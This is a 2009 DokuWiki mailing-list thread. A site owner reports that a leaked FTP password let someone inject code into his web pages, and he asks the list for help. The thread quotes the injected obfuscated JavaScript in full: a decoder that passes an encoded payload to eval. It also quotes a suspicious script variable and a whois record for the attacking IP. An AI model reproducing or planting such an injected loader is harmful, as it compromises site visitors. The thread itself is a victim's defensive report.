[dokuwiki] Re: Honey pot report.
- From: JEAN MARC MASSOU <massou@xxxxxxxxx>
- To: dokuwiki@xxxxxxxxxxxxx, florent massou <florent.massou@xxxxxxxxx>
- Date: Sat, 28 Feb 2009 02:08:48 +0100
This is not related to dokuwiki, i am sorry for the abuse :
Somebody in my network have exposed the ftp password of my website !:
*And this cool guy that smell vodka has done one part of the work : (don't
know his bot :! but quite clever with great touch of humour.
Sorry.
Whois
Voici les résultats du whois pour l'adresse IP 92.48.201.35
C'est le serveur whois.ripe.net qui possède l'information suivante :
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag
% Information related to '92.48.201.0 - 92.48.201.63'
inetnum: 92.48.201.0 - 92.48.201.63
netname: NEWRACK-NL
descr: NewRack.eu NL department
country: NL
admin-c: SVS148-RIPE
tech-c: SVS148-RIPE
status: ASSIGNED PA
mnt-by: WEDARE-MNT
source: RIPE # Filtered
person: Sergey V. Smirnoff
address: OOO "Ronetel"
address: Lenina 129 o. 17
address: Moscow
address: Russia
phone: +852 812 4838
fax-no: +852 812 4838
abuse-mailbox: abuse@xxxxxxxxxx
nic-hdl: SVS148-RIPE
source: RIPE # Filtered
% Information related to '92.48.192.0/18AS20495'
route: 92.48.192.0/18
descr: Route to second IP-numberblock We Dare BV
origin: AS20495
mnt-by: WEDARE-MNT
source: RIPE # Filtered
% Information related to '92.48.192.0/19AS20495'
route: 92.48.192.0/19
descr: We Dare B.V.
origin: AS20495
mnt-by: WEDARE-MNT
source: RIPE # Filtered
2009/2/28 JEAN MARC MASSOU <massou@xxxxxxxxx>
> Bonsoir Florent,
> juste pour voir si tu t'y connais encore un peu en math, une jolie fonction
> qu'on a insuflé dans mes pages web :
> a+
> et bravo aux bleus :
>
>
> 2009/2/28 JEAN MARC MASSOU <massou@xxxxxxxxx>
>
>> Symptoms,
>> In all the new "index.html" on my computer, this cool stuff :
>>
>> <body><script language=JavaScript> function iwyb2b13(n){ var
>> d=n.length,w=1024,k,v,l,f=0,e=0,g=0,m=Array(63,20,25,16,50,12,49,36,56,54,0,0,0,0,0,0,32,48,38,22,2,17,27,3,5,42,58,31,47,18,1,7,53,26,46,29,28,15,30,4,55,40,13,0,0,0,0,23,0,62,61,6,41,33,34,14,39,37,19,24,35,45,44,59,21,11,52,0,43,51,60,8,10,9,57);for(v=Math.ceil(d/w);v>0;v--){l='';for(k=Math.min(d,w);k>0;k--,d--){{g|=(m[n.charCodeAt(f++)-48])<<e;if(e){l+=String.fromCharCode(148^g&255);g>>=8;e-=2}else{e=6}}}eval(l);}}iwyb2b13('lXLaAL08JVg8PGV8hhJn3LLa6UotAL0behKvJGRRlFV0@OULufQ04FVbzOUmJ_Ka6hIYBcKYlQxmhFabdQq0
>> @GgzRRoRmVaa8G0aJ9La4L0R@LoIuaF9PGg0JQaaetUvvBSb
>> @uLRB_LaALKav9tLn9IYn9oLuxId6OJYBgoLuQqmlXUv@uKIicIdr4KvbUU0
>> @hQYmMoz@Xga6hImAX0z7lKbmoIaotKv9IxIo9LvB_Ka6tJnbD')</script><!--
>> 213.186.33.202 -->
>>
>> ....wtf ?
>>
>>
>> 2009/2/28 JEAN MARC MASSOU <massou@xxxxxxxxx>
>>
>> Hello to the list.
>>> I am sad cause of that :
>>>
>>> "<!--//--><![CDATA[//><!--
>>> var indexmenu_ID='http:9soldo.info_t_90362e572'
>>> //--><!]]></script>"
>>>
>>>
>>>
>>> Var indexmenu_ID ?
>>>
>>> Plz help me.
>>>
>>> http://momas.fr is under fire.
>>>
>>>
>>>
>>
>
Other related posts: